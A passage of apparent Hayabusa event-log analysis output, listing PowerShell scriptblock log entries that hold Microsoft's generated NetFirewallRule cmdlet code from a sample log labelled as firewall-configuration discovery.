[object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Enable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdlet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Disable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] 